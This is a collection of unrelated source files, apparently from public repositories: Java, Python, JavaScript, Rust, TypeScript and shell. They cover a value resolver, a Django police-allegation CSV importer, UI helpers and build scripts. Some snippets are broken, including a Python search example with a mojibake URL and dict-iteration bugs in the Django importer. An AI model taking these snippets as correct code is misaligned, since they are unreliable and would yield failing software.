}
@SuppressWarnings({ "unchecked", "rawtypes" })
public Maybe<T> getMaybe() {
if (started.getAndSet(true))
throw new IllegalStateException("ValueResolver can only be used once");
if (expired) return Maybe.absent("Nested resolution of "+getOriginalValue()+" did not complete within "+timeout);
CountdownTimer timerU = parentTimer;
if (timerU==null && timeout!=null)
timerU = timeout.countdownTimer();
final CountdownTimer timer = timerU;
if (timer!=null && !timer.isRunning())
timer.start();
checkTypeNotNull();
Object v = this.value;
//if the expected type is a closure or map and that's what we have, we're done (or if it's null);
//but not allowed to return a future or DeferredSupplier as the resolved value
if (v==null || (!forceDeep && type.isInstance(v) && !Future.class.isInstance(v) && !DeferredSupplier.class.isInstance(v)))
return Maybe.of((T) v);
try {
//if it's a task or a future, we wait for the task to complete
if (v instanceof TaskAdaptable<?>) {
//if it's a task, we make sure it is submitted
if (!((TaskAdaptable<?>) v).asTask().isSubmitted() ) {
// TODO could try to get exec context from Tasks.current() ... should we?
if (exec==null)
return Maybe.absent("Value for unsubmitted task '"+getDescription()+"' requested but no execution context available");
exec.submit(((TaskAdaptable<?>) v).asTask());
}
}
if (v instanceof Future) {
final Future<?> vfuture = (Future<?>) v;
//including tasks, above
if (!vfuture.isDone()) {
Callable<Maybe> callable = new Callable<Maybe>() {
public Maybe call() throws Exception {
return Durations.get(vfuture, timer);
} };
String description = getDescription();
Maybe vm = Tasks.withBlockingDetails("Waiting for "+description, callable);
if (vm.isAbsent()) return vm;
v = vm.get();
} else {
v = vfuture.get();
}
} else if (v instanceof DeferredSupplier<?>) {
final Object vf = v;
Callable<Object> callable = new Callable<Object>() {
public Object call() throws Exception {
return ((DeferredSupplier<?>) vf).get();
} };
if (Boolean.TRUE.equals(embedResolutionInTask) || timeout!=null) {
if (exec==null)
return Maybe.absent("Embedding in task needed for '"+getDescription()+"' but no execution context available");
String description = getDescription();
Task<Object> vt = exec.submit(Tasks.<Object>builder().body(callable).name("Resolving dependent value").description(description).build());
Maybe<Object> vm = Durations.get(vt, timer);
vt.cancel(true);
if (vm.isAbsent()) return (Maybe<T>)vm;
v = vm.get();
} else {
v = callable.call();
}
} else if (v instanceof Map) {
//and if a map or list we look inside
Map result = Maps.newLinkedHashMap();
for (Map.Entry<?,?> entry : ((Map<?,?>)v).entrySet()) {
Maybe<?> vv = new ValueResolver(entry.getValue(), type, this)
.description( (description!=null ? description+", " : "") + "map entry "+entry.getKey() )
.getMaybe();
if (vv.isAbsent()) return (Maybe<T>)vv;
result.put(entry.getKey(), vv.get());
}
return Maybe.of((T) result);
} else if (v instanceof Set) {
Set result = Sets.newLinkedHashSet();
int count = 0;
for (Object it : (Set)v) {
Maybe<?> vv = new ValueResolver(it, type, this)
.description( (description!=null ? description+", " : "") + "entry "+count )
.getMaybe();
if (vv.isAbsent()) return (Maybe<T>)vv;
result.add(vv.get());
count++;
}
return Maybe.of((T) result);
} else if (v instanceof Iterable) {
List result = Lists.newArrayList();
int count = 0;
for (Object it : (Iterable)v) {
Maybe<?> vv = new ValueResolver(it, type, this)
.description( (description!=null ? description+", " : "") + "entry "+count )
.getMaybe();
if (vv.isAbsent()) return (Maybe<T>)vv;
result.add(vv.get());
count++;
}
return Maybe.of((T) result);
} else {
return TypeCoercions.tryCoerce(v, TypeToken.of(type));
}
} catch (Exception e) {
Exceptions.propagateIfFatal(e);
IllegalArgumentException problem = new IllegalArgumentException("Error resolving "+(description!=null ? description+", " : "")+v+", in "+exec+": "+e, e);
if (swallowExceptions) {
if (log.isDebugEnabled())
log.debug("Resolution of "+this+" failed, swallowing and returning: "+e);
return Maybe.absent(problem);
}
if (log.isDebugEnabled())
log.debug("Resolution of "+this+" failed, throwing: "+e);
throw problem;
}
return new ValueResolver(v, type, this).getMaybe();
}
protected String getDescription() {
return description!=null ? description : ""+value;
}
protected Object getOriginalValue() {
if (parentOriginalValue!=null) return parentOriginalValue;
return value;
}
} |
<filename>src/com/th3shadowbroker/AtMessage/Loaders/Events.java
package com.th3shadowbroker.AtMessage.Loaders;
import com.th3shadowbroker.AtMessage.Backward.WhisperMessage_1_9_2;
import com.th3shadowbroker.AtMessage.Events.AddToCache;
import com.th3shadowbroker.AtMessage.Events.RemoveFromCache;
import com.th3shadowbroker.AtMessage.Events.UpdateNotification;
import com.th3shadowbroker.AtMessage.Events.WhisperMessage;
import com.th3shadowbroker.AtMessage.Backward.WhisperMessage_1_9_4;
import com.th3shadowbroker.AtMessage.Objects.ServerVersionCheck;
import com.th3shadowbroker.AtMessage.main;
public class Events {
public main plugin;
//Construction
public Events( main loaderClass )
{
this.plugin = loaderClass;
registerEvents();
}
//LoadUp sequence
@SuppressWarnings("SuspiciousIndentAfterControlStatement")
private void registerEvents()
{
try {
if ( null != ServerVersionCheck.getCurrentVersion() )
//Setup the AtMessage-Message listener
switch (ServerVersionCheck.getCurrentVersion()) {
case SERVER_1_9_2:
plugin.getServer().getPluginManager().registerEvents( new WhisperMessage_1_9_2(this) , plugin);
System.out.println( plugin.ConsolePrefix + "Backward compatibility activated for 1.9.2" );
break;
case SERVER_1_9_4:
plugin.getServer().getPluginManager().registerEvents(new WhisperMessage_1_9_4(this) , plugin);
System.out.println( plugin.ConsolePrefix + "Backward compatibility activated for 1.9.4" );
break;
case SERVER_1_10_0:
plugin.getServer().getPluginManager().registerEvents( new WhisperMessage(this) , plugin);
System.out.println( plugin.ConsolePrefix + "Hey! You are up to date that's awesome !" );
break;
default:
break;
}
//Send update notification if update is available
plugin.getServer().getPluginManager().registerEvents( new UpdateNotification(this) , plugin);
//Add joined players to cache
plugin.getServer().getPluginManager().registerEvents( new AddToCache(this) , plugin);
//Remove already cached players on quit
plugin.getServer().getPluginManager().registerEvents( new RemoveFromCache(this) , plugin);
//Send spy-messages to spectators
//plugin.getServer().getPluginManager().registerEvents( new SendToSpectator(this) , plugin);
} catch ( Exception ex ) {
ex.printStackTrace();
}
}
}
|
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd cartoon -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd cartoon -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd art_painting -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd art_painting -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd sketch -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd sketch -log 10 -dg 1 -data PACS -arch resnet18 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd photo -log 10 -dg 1 -data PACS -arch resnet50 -bs 60
CUDA_VISIBLE_DEVICES=0 python3 test.py -hd photo -log 10 -dg 1 -data PACS -arch resnet18 -bs 60 |
<filename>util/type_generator.py
import math
import random
import os
part_tbl_file = "../TPC-H/dbgen/part.tbl"
column_id = 4
part_csv_file = "../data-backup/type/part.csv"
output_file_prefix = "./type_"
inject_string = "SMALL POLISHED SILVER"
selectivity = 0.02
def extract_from_tbl():
with open(part_tbl_file, 'r') as inF:
content = inF.readlines()
with open(part_csv_file, 'w') as outF:
for line in content:
outF.write(line.split('|')[column_id] + "\n")
def inject_matching_string():
with open(part_csv_file, 'r') as inF:
content = inF.readlines()
number_of_lines = len(content)
occurrences = int(math.ceil(number_of_lines * selectivity))
match_positions = random.sample(range(1,number_of_lines + 1), occurrences)
with open(output_file_prefix + str(selectivity) + "_data.csv", 'w') as outF:
for i in range(0, number_of_lines):
if i in match_positions:
outF.write(inject_string)
outF.write("\n")
else:
outF.write(content[i])
with open(output_file_prefix + str(selectivity) + "_data.csv", 'rb+') as outF:
outF.seek(-1, os.SEEK_END)
outF.truncate()
inject_matching_string() |
// function gets all inputs in the search form and check if value is present
// if value is present it activates the reset button
function activateResetButton(){
var resetBtnEle = $("#resetknet");
var knetInputs = $(':input').filter('input,select,textarea');
knetInputs.each(function(index,element){
$(element).keyup(function(){
if(element.value !== ''){
resetBtnEle.show();
}else{
resetBtnEle.hide();
}
})
})
}
function activateButton(option){
$('.resultViewer:visible').fadeOut(0, function () {
$('.button_off').attr('class', 'button_on');
$('#' + option).fadeIn();
$('#' + option + '_button').attr('class', 'button_off');
//Collapse Suggestor view
$('#suggestor_search').attr('src', 'html/image/qs_expand.png');
$('#suggestor_search_area').slideUp(500);
//$('#suggestor_search').dialog('close');
});
}
/*
Functions for Add, Remove or Replace terms from the query search box
*/
function addKeyword(keyword, from, target) {
query = $('#' + target).val();
newquery = query + ' OR ' + keyword;
$('#' + target).val(newquery);
$('#' + from).toggleClass('addKeywordUndo addKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
function addKeywordUndo(keyword, from, target) {
query = $('#' + target).val();
newquery = query.replace(' OR ' + keyword, "");
$('#' + target).val(newquery);
$('#' + from).toggleClass('addKeywordUndo addKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
function excludeKeyword(keyword, from, target) {
query = $('#' + target).val();
newquery = query + ' NOT ' + keyword;
$('#' + target).val(newquery);
$('#' + from).toggleClass('excludeKeywordUndo excludeKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
function excludeKeywordUndo(keyword, from, target) {
query = $('#' + target).val();
newquery = query.replace(' NOT ' + keyword, "");
$('#' + target).val(newquery);
$('#' + from).toggleClass('excludeKeywordUndo excludeKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
function replaceKeyword(oldkeyword, newkeyword, from, target) {
query = $('#' + target).val();
newquery = query.replace(oldkeyword, newkeyword);
$('#' + target).val(newquery);
$('#' + from).toggleClass('replaceKeywordUndo replaceKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
function replaceKeywordUndo(oldkeyword, newkeyword, from, target) {
query = $('#' + target).val();
newquery = query.replace(newkeyword, oldkeyword);
$('#' + target).val(newquery);
$('#' + from).toggleClass('replaceKeywordUndo replaceKeyword');
//Updates the query counter
matchCounter();
// Refresh the query suggester table as well by replicating its 'click' event.
refreshQuerySuggester();
}
// function toggle the close button so users have the choice to show the their example queries or hide it
function queryToggle(){
var queryButton = $('.close');
var queryStatus = true;
$(queryButton).click(function(){
// example queries block
var examplequeries = $("#eg_queries");
var exampletitle = $(".details> h3")
// example queries block close button image
var queryImage = queryButton.children();
if(queryStatus){
examplequeries.hide();
queryImage.attr('src','html/image/drop-down.png');
exampletitle.css('margin-bottom','0');
queryStatus = false;
}else{
queryImage.attr('src','html/image/close_button.png');
examplequeries.show();
exampletitle.css('margin-bottom','1rem');
queryStatus = true;
}
});
}
/*
* Function
*
*/
function contactWindow() {
window.open("html/contact.html", "KnetMiner-Contact", "status=0, toolbar=0, location=0, menubar=0, height=200, width=400, resizable=0");
}
function activateSpinner(target) {
// maskloader animation
$(target).maskLoader({
// fade effect
'fade': true,
'z-index': '999',
'background': '#F4F5F7',
'opacity': '0.6',
// position property
'position': 'absolute',
// custom loading spinner
'imgLoader': false,
// If false, you will have to run the "create" function.
// Ex: $('body').maskLoader().create();
'autoCreate':true,
// displayes text alert
'textAlert':false
});
}
/*
* Function
*
*/
function getRadioValue(radio) {
var radioValue;
for (var i = 0; i < radio.length; i++) {
if (radio[i].checked) {
radioValue = radio[i].value;
}
}
return radioValue;
}
function deactivateSpinner(target) {
$(target).maskLoader().destroy();
}
|
import csv
import datetime
from django.core import management
from django.core.exceptions import MultipleObjectsReturned
from django.core.management.base import BaseCommand
from django.db.models import Q
from common.models import (
Officer, Allegation, PoliceWitness, Area, AllegationCategory,
OfficerAllegation)
from common.constants import FOIA_START_DATE
OFFICER_COLS = {
'officer_first': 2,
'officer_last': 3,
'gender': 4,
'race': 6,
'appt_date': 7,
'star': 8,
'rank': 9,
'unit': 10,
'birth_year': 11,
'active': 12
}
ALLEGATION_COLS = {
'crid': 1,
'officer': 2,
'cat': 3,
'recc_finding': 6,
'recc_outcome': 7,
'final_finding': 8,
'final_outcome': 9,
'beat': 14,
'location': 15,
'add1': 16,
'add2': 17,
'city': 18,
'incident_date': 19,
'start_date': 20,
'end_date': 21,
'investigator_id': 22,
'final_outcome_class': 23
}
OFFICER_ALLEGATION_COLS = [
'officer', 'cat', 'recc_finding', 'recc_outcome', 'final_finding',
'final_outcome', 'final_outcome_class', 'start_date', 'end_date'
]
class Command(BaseCommand):
help = 'Import new data in csv format'
wudi_id_mapping = {}
def add_arguments(self, parser):
parser.add_argument('--files', nargs=3)
def handle(self, *args, **options):
self.rows = {
'new': [],
'update': [],
'undecided': [],
}
self.import_officers(*args, **options)
self.reassign_allegations(*args, **options)
management.call_command('calculate_allegations_count')
management.call_command('clean_officer_names')
self.check_officer_count(*args, **options)
# management.call_command('geocode_allegations')
def reassign_allegations(self, *args, **options):
allegation_cache = {}
for allegation in Allegation.objects.all():
allegation_cache[allegation.crid] = {
'number_of_request': allegation.number_of_request,
'document_id': allegation.document_id,
'document_normalized_title':
allegation.document_normalized_title,
'document_title': allegation.document_title,
'document_requested': allegation.document_requested,
'document_pending': allegation.document_pending,
'last_requested': allegation.last_requested
}
out = csv.writer(open('not_found_allegations.csv', 'w'))
out.writerow([
'id', 'crid', 'officer_id', 'cat_id', 'category',
'allegation_name', 'recc_finding', 'recc_outcome', 'final_finding',
'final_outcome', 'finding_edit', 'result', 'outcome_edit',
'value', 'beat', 'location', 'add1', 'add2', 'city',
'incident_date', 'start_date', 'end_date', 'investigator_id',
'final_outcome_class', ''])
Allegation.objects.all().delete()
allegation_file = csv.reader(open(options['files'][1]))
next(allegation_file)
counter = 0
for row in allegation_file:
if counter % 1000 == 0:
print(counter)
counter += 1
if row[2] in self.wudi_id_mapping:
officer = self.wudi_id_mapping[row[2]]
else:
officer = None
out.writerow(row)
crid = row[1]
if not crid:
continue
kwargs = {}
for col in ALLEGATION_COLS:
val = row[ALLEGATION_COLS[col]]
if val:
if col == 'add1':
val = int(val) if val else None
if col == 'beat':
try:
val = val.zfill(4)
val = Area.objects.get(
name=val, type='police-beats')
except Area.DoesNotExist:
val = None
except MultipleObjectsReturned:
val = Area.objects.filter(
name=val, type='police-beats').first()
if col == 'cat':
try:
val = AllegationCategory.objects.get(cat_id=val)
except AllegationCategory.DoesNotExist:
val = None
if col == 'officer':
val = officer
if col == 'incident_date':
if val:
val = datetime.datetime.strptime(
val, '%Y-%m-%d %H:%M')
else:
val = '1970-01-01 00:00'
if col in ['start_date', 'end_date']:
if val:
val = datetime.datetime.strptime(val, '%Y-%m-%d')
else:
val = None
kwargs[col] = val
else:
val = None
if crid in allegation_cache:
for key in allegation_cache[crid]:
if key == 'last_requested':
kwargs[key] = datetime.datetime.strftime(
allegation_cache[crid][key],
'%Y-%m-%d %H:%M:%S')
else:
kwargs[key] = allegation_cache[crid][key]
try:
officer_allegation_kwargs = {
k: v for k, v in kwargs if k in OFFICER_ALLEGATION_COLS}
kwargs = {
k: v for k, v in kwargs
if k not in OFFICER_ALLEGATION_COLS}
allegation = Allegation.objects.create(**kwargs)
officer_allegation_kwargs['allegation'] = allegation
OfficerAllegation.objects.create(
**officer_allegation_kwargs)
except Exception as inst:
print(inst, row)
def import_officers(self, *args, **options):
print('Importing officers...')
allegation_file = csv.reader(open(options['files'][1]))
new_prefoia_ids = self.find_new_prefoia_officer_ids(allegation_file)
prefoia_ids = Allegation.objects.filter(
incident_date__lt=FOIA_START_DATE
).values_list('officer_id', flat=True)
update_queue = []
file = csv.reader(open(options['files'][0]))
Officer.objects.filter(pk__in=[9029, 9016, 8960, 8941]).delete()
exclude_ids = []
counter = 0
next(file)
for row in file:
if counter % 1000 == 0:
print(counter)
counter += 1
by_name = Officer.objects.filter(
officer_first__iexact=row[2],
officer_last__iexact=row[3]
).exclude(pk__in=exclude_ids)
appt_date_or_star = Q()
if row[7]:
appt_date_or_star |= Q(appt_date__icontains=row[7])
if row[8]:
appt_date_or_star |= Q(star=float(row[8]))
officers = by_name.filter(appt_date_or_star)
if len(officers) == 0:
self.rows['new'].append(row)
elif len(officers) == 1:
update_queue, exclude_ids = self.handle_update(
row, officers, update_queue, exclude_ids)
else:
if not row[10] or not row[0] in new_prefoia_ids:
update_queue = self.handle_undecided(
row, officers, update_queue)
else:
officers = officers.filter(
id__in=prefoia_ids, unit__unit_name__icontains=row[10])
if len(officers) == 0:
self.rows['new'].append(row)
elif len(officers) == 1:
update_queue, exclude_ids = self.handle_update(
row, officers, update_queue, exclude_ids)
else:
update_queue = self.handle_undecided(
row, officers, update_queue)
print("Updating officers")
for officers, info, row in update_queue:
officers.update(**info)
for officer in officers:
self.wudi_id_mapping[row[0]] = officer
print("Inserting new officers")
for row in self.rows['new']:
info = self.build_officer_info(row)
officer = Officer.objects.create(**info)
self.wudi_id_mapping[row[0]] = officer
print("Done importing officers")
for group in self.rows:
print(group + ' officers: ' + str(len(self.rows[group])))
def find_new_prefoia_officer_ids(self, file):
ids = []
next(file)
for row in file:
if row[19] and \
datetime.datetime.strptime(
row[19].split(' ')[0], '%Y-%m-%d') < \
datetime.datetime.strptime(FOIA_START_DATE, '%Y-%m-%d'):
ids.append(row[2])
return ids
def handle_undecided(self, row, officers, update_queue):
to_delete = max([o.id for o in officers])
to_keep = officers.exclude(id=to_delete)
if len(to_keep) == 1:
# Allegation.objects.filter(officer_id=to_delete)\
# .update(officer_id=to_keep.first().id)
PoliceWitness.objects.filter(officer_id=to_delete)\
.update(officer_id=to_keep.first().id)
officers.filter(id=to_delete).delete()
update_queue.append((to_keep, self.build_officer_info(row), row))
# solution = input('Officer ID to update or "c" to create. Delete manually in db and "s" to skip:')
# if solution == 'c':
# self.rows['new'].append(row)
# elif solution != 's':
# update = officers.filter(id=solution)
# update_queue.append((update, self.build_officer_info(row), row))
else:
print('Row %s' % row[0])
return update_queue
def handle_update(self, row, officers, update_queue, exclude_ids):
if officers[0].id in [x[0].id for x, y, z in update_queue]:
self.rows['new'].append(row)
else:
self.rows['update'].append(row)
update_queue.append((officers, self.build_officer_info(row), row))
exclude_ids.append(officers.first().id)
return update_queue, exclude_ids
def build_officer_info(self, row):
info = {}
for col in OFFICER_COLS:
if row[OFFICER_COLS[col]]:
info[col] = row[OFFICER_COLS[col]]
else:
info[col] = None
return info
def check_officer_count(self, *args, **options):
print('Comparing officers...')
mismatched = {
'less': [],
'more': [],
}
file = csv.reader(open(options['files'][2]))
next(file)
for row in file:
name = row[0].split(', ', maxsplit=1)
count = int(row[2])
officers = Officer.objects.filter(
officer_first__iexact=name[1],
officer_last__iexact=name[0]
)
if len(officers) < count:
mismatched['less'].append(row)
elif len(officers) > count:
mismatched['more'].append(row)
else:
officer = officers[0]
if row[4] != officer.allegations_count:
print('Different allegation count for %s' % officer.id)
for group in mismatched:
print(group, str(len(mismatched[group])))
print(mismatched['less'])
print(mismatched['more'])
|
use std::io::prelude::*;
use std::net::TcpListener;
use std::net::TcpStream;
fn handle_connection(mut stream: TcpStream) {
let response = b"<html><body><h1>Hello World!</h1></body></html>";
stream.write(response).unwrap();
stream.flush().unwrap();
}
fn main() {
let listener = TcpListener::bind("127.0.0.1:8080").unwrap();
for stream in listener.incoming() {
let stream = stream.unwrap();
handle_connection(stream);
}
println!("Server successfully initiated!");
} |
import {jpBasePath} from "./_base";
export const jpPathResetPW = jpBasePath.appendPathSegment<{email: string, hash: string}>("/reset-pw/:email/:hash"); |
import * as THREE from 'three'
import { World } from './World'
export class MaterialLayer {
constructor(public id?: number, public material?: THREE.Material) {
}
static async FromJSON(world: World, json: any): Promise < MaterialLayer > {
return new Promise < MaterialLayer >(resolve => {
// "id": The layer's id in the material.
// "material": This is a definition of a Material from THREE.js, however it
// differs by the following points: Textures are loaded from the QuarkWorld passed,
// and no UUID is associated to the material.
var loader = new THREE.MaterialLoader()
loader.setTextures(<any>world.textures)
var layer = new MaterialLayer()
layer.id = json.id
layer.material = loader.parse(json.material)
resolve(layer)
})
}
} |
<reponame>GiantLuigi4/origins-architectury<gh_stars>0
package io.github.apace100.origins.registry;
import net.minecraft.entity.damage.DamageSource;
public class ModDamageSources {
public static final DamageSource NO_WATER_FOR_GILLS = new DamageSource("no_water_for_gills").setBypassesArmor().setUnblockable();
public static final DamageSource GENERIC_DOT = new DamageSource("genericDamageOverTime").setBypassesArmor().setUnblockable();
}
|
package ru.skarpushin.swingpm.base;
import javax.swing.JComponent;
public interface HasRootComponent {
JComponent getRootComponent();
}
|
#!/bin/bash
HOST=${HOST:-localhost}
PORT=${PORT:-9101}
curl http://${HOST}:${PORT}/v1/tasks?watch |
import { IsDefined, MaxLength } from 'class-validator';
import { Field, InputType } from '@nestjs/graphql';
@InputType()
export class LoginUserInput {
@Field()
@IsDefined()
@MaxLength(15)
username: string;
@Field()
@IsDefined()
@MaxLength(15)
password: string;
}
|
<gh_stars>10-100
package com.createchance.imageeditor.shaders;
import android.opengl.GLES20;
/**
* RGB channel adjust fragment shader.
*
* @author createchance
* @date 2018/11/25
*/
public class RGBAdjustFragmentShader extends AbstractShader {
private static final String TAG = "RGBAdjustFragmentShader";
private final String FRAGMENT_SHADER = "RGBAdjustFragmentShader.glsl";
private final String U_INPUT_TEXTURE = "u_InputTexture";
private final String U_RED = "u_Red";
private final String U_GREEN = "u_Green";
private final String U_BLUE = "u_Blue";
private int mUInputTexture, mURed, mUGreen, mUBlue;
public RGBAdjustFragmentShader() {
initShader(FRAGMENT_SHADER, GLES20.GL_FRAGMENT_SHADER);
}
@Override
public void initLocation(int programId) {
mUInputTexture = GLES20.glGetUniformLocation(programId, U_INPUT_TEXTURE);
mURed = GLES20.glGetUniformLocation(programId, U_RED);
mUGreen = GLES20.glGetUniformLocation(programId, U_GREEN);
mUBlue = GLES20.glGetUniformLocation(programId, U_BLUE);
}
public void setUInputTexture(int textureTarget, int textureId) {
// bind texture
GLES20.glActiveTexture(textureTarget);
GLES20.glBindTexture(GLES20.GL_TEXTURE_2D, textureId);
GLES20.glUniform1i(mUInputTexture, textureTarget - GLES20.GL_TEXTURE0);
}
public void setURed(float red) {
GLES20.glUniform1f(mURed, red);
}
public void setUGreen(float green) {
GLES20.glUniform1f(mUGreen, green);
}
public void setUBlue(float blue) {
GLES20.glUniform1f(mUBlue, blue);
}
}
|
class CreateStories < ActiveRecord::Migration
def change
create_table :stories do |t|
t.string :title
t.string :description
t.string :visual_content
t.integer :user_id
t.string :audio
t.string :transcript
end
end
end
|
import requests
# define query
query = { "q": "WebSearh API" }
# call search API
r = requests.get(url=" ยงยง.example.com/search-api", params=query)
# get search results
results = r.json()
# parse and process results
for result in results:
title = result["title"]
url = result["url"]
# Processes title and url |
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2009 <NAME> All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import tarfile
import time
from contextlib import closing
with closing(tarfile.open('example.tar', 'r')) as t:
for member_info in t.getmembers():
print member_info.name
print '\tModified:\t', time.ctime(member_info.mtime)
print '\tMode :\t', oct(member_info.mode)
print '\tType :\t', member_info.type
print '\tSize :\t', member_info.size, 'bytes'
print
|
#! /bin/bash
set -e
if [ "$1" = 'java' ]; then
chown -R mirth /opt/mirth-connect/appdata
exec gosu mirth "$@"
fi
exec "$@" |
//
// Created by ooooo on 2020/2/14.
//
#ifndef CPP_0078__SOLUTION1_H_
#define CPP_0078__SOLUTION1_H_
#include <iostream>
#include <vector>
using namespace std;
/**
* ๅๆบฏ
*/
class Solution {
public:
void dfs(int cur_count, int count, int index) {
if (cur_count == count) {
ans.push_back(num);
return;
}
for (int i = index; i < nums.size(); ++i) {
num.push_back(nums[i]);
dfs(cur_count + 1, count, i + 1);
num.pop_back();
}
}
vector<vector<int>> ans;
vector<int> nums, num;
vector<vector<int>> subsets(vector<int> &nums) {
this->nums = nums;
for (int i = 0; i <= nums.size(); ++i) {
num.clear();
dfs(0, i, 0);
}
return ans;
}
};
#endif //CPP_0078__SOLUTION1_H_
|
import React from "react"
const SiteFooterLink = ({linkText, linkPath, newTab}) => (
<li className="c-site-footer__list-item">
<a
href={linkPath}
className="c-site-footer__link"
target={newTab ? '_blank' : ''}
rel="noopener noreferrer"
>
{ linkText }
</a>
</li>
)
export default SiteFooterLink
|
#!/bin/bash
$(echo '#ifndef __CONFIG_H__' > config.h; \
echo '#define __CONFIG_H__' >> config.h; \
while read -r line; do \
if [[ `expr "$line" : "CONFIG_"` -ne 7 ]]; then \
continue; \
fi; \
name=`echo $line | cut -d"=" -f1`; \
value=`echo $line | cut -d"=" -f2`; \
#value=$${value/\#\'/}; \
#value=$${value/%\'/}; \
#value=$${value/\#\"/}; \
#value=$${value/%\"/}; \
echo "#define $name $value" >> config.h; \
done < ".config"; \
echo '#endif /* __CONFIG_H__ */' >> config.h;)
|
<reponame>vharsh/cattle2<gh_stars>0
package io.cattle.platform.lock;
public interface LockCallbackWithException<T, E extends Throwable> {
T doWithLock() throws E;
}
|
// SPDX-License-Identifier: Apache-2.0
// YAPION
// Copyright (C) 2019,2020 yoyosource
package yapion.serializing.api;
import yapion.annotations.deserialize.YAPIONLoadExclude;
import yapion.annotations.serialize.YAPIONSaveExclude;
import yapion.serializing.SerializeManager;
import java.util.Queue;
@YAPIONSaveExclude(context = "*")
@YAPIONLoadExclude(context = "*")
@SuppressWarnings({"java:S1610"})
public abstract class SerializerQueue<T extends Queue<?>> implements SerializerQueueInterface<T> {
/**
* Add this ListSerializer to the SerializeManager by calling
* {@link SerializeManager#add(SerializerQueueInterface)}.
*/
public final void add() {
SerializeManager.add(this);
}
} |
def process_dhcp_client(session, module, present):
result = {'changed': False, 'result': ''}
current = session.get_dhcp_client_info() # Assume a method to retrieve current DHCP client information
if present and (current['name'] != module['name']
or current['ipAddress'] != module['ip']
or current['mac'] != module['mac']):
if not module.check_mode:
session.del_dhcp_client(current['id']) # Assume a method to delete DHCP client
result['result'] = session.post_dhcp_client(module['name'], module['ip'], module['mac'], True) # Assume a method to add/update DHCP client
result['changed'] = True
elif present:
if not module.check_mode:
result['result'] = session.post_dhcp_client(module['name'], module['ip'], module['mac'], True) # Assume a method to add/update DHCP client
return result |
#!/usr/bin/env bash
# resolve python-version to use
if [[ -z "$PYTHON" ]]; then
if ! PYTHON=$(command -v python3 || command -v python2 || command -v python || command -v py)
then
echo "Unable to locate build-dependency python!" 1>&2
exit 1
fi
fi
# validate python-dependency
# useful in case of explicitly set option.
if ! command -v "$PYTHON" > /dev/null
then
echo "Unable to locate build-dependency python ($PYTHON)!" 1>&2
exit 1
fi
export PYTHON
usage_list+=("-nopgooptimize: do not use profile guided optimizations.")
usage_list+=("-pgoinstrument: generate instrumented code for profile guided optimization enabled binaries.")
usage_list+=("-skipcrossarchnative: Skip building cross-architecture native binaries.")
usage_list+=("-staticanalyzer: use scan_build static analyzer.")
usage_list+=("-component: Build individual components instead of the full project. Available options are 'jit', 'runtime', 'paltests', 'alljits', and 'iltools'. Can be specified multiple times.")
setup_dirs_local()
{
setup_dirs
mkdir -p "$__LogsDir"
mkdir -p "$__MsbuildDebugLogsDir"
if [[ "$__CrossBuild" == 1 ]]; then
mkdir -p "$__CrossComponentBinDir"
fi
}
restore_optdata()
{
local OptDataProjectFilePath="$__ProjectRoot/.nuget/optdata/optdata.csproj"
if [[ "$__PgoOptimize" == 1 && "$__IsMSBuildOnNETCoreSupported" == 1 ]]; then
# Parse the optdata package versions out of msbuild so that we can pass them on to CMake
local PgoDataPackagePathOutputFile="${__IntermediatesDir}/optdatapath.txt"
local RestoreArg=""
if [[ "$__SkipRestoreOptData" == "0" ]]; then
RestoreArg="/restore"
fi
# Writes into ${PgoDataPackagePathOutputFile}
"$__RepoRootDir/eng/common/msbuild.sh" /clp:nosummary $__ArcadeScriptArgs $OptDataProjectFilePath $RestoreArg /t:DumpPgoDataPackagePath \
${__CommonMSBuildArgs} /p:PgoDataPackagePathOutputFile=${PgoDataPackagePathOutputFile} \
-bl:"$__LogsDir/PgoVersionRead_$__ConfigTriplet.binlog" > /dev/null 2>&1
local exit_code="$?"
if [[ "$exit_code" != 0 || ! -f "${PgoDataPackagePathOutputFile}" ]]; then
echo "${__ErrMsgPrefix}Failed to get PGO data package path."
exit "$exit_code"
fi
__PgoOptDataPath=$(<"${PgoDataPackagePathOutputFile}")
fi
}
build_cross_architecture_components()
{
local intermediatesForBuild="$__IntermediatesDir/Host$__CrossArch/crossgen"
local crossArchBinDir="$__BinDir/$__CrossArch"
mkdir -p "$intermediatesForBuild"
mkdir -p "$crossArchBinDir"
__SkipCrossArchBuild=1
# check supported cross-architecture components host(__HostArch)/target(__BuildArch) pair
if [[ ("$__BuildArch" == "arm" || "$__BuildArch" == "armel") && ("$__CrossArch" == "x86" || "$__CrossArch" == "x64") ]]; then
__SkipCrossArchBuild=0
elif [[ "$__BuildArch" == "arm64" && "$__CrossArch" == "x64" ]]; then
__SkipCrossArchBuild=0
else
# not supported
return
fi
__CMakeBinDir="$crossArchBinDir"
CROSSCOMPILE=0
export __CMakeBinDir CROSSCOMPILE
__CMakeArgs="-DCLR_CMAKE_TARGET_ARCH=$__BuildArch -DCLR_CROSS_COMPONENTS_BUILD=1 $__CMakeArgs"
build_native "$__TargetOS" "$__CrossArch" "$__ProjectRoot" "$intermediatesForBuild" "crosscomponents" "$__CMakeArgs" "cross-architecture components"
CROSSCOMPILE=1
export CROSSCOMPILE
}
handle_arguments_local() {
case "$1" in
nopgooptimize|-nopgooptimize)
__PgoOptimize=0
__SkipRestoreOptData=1
;;
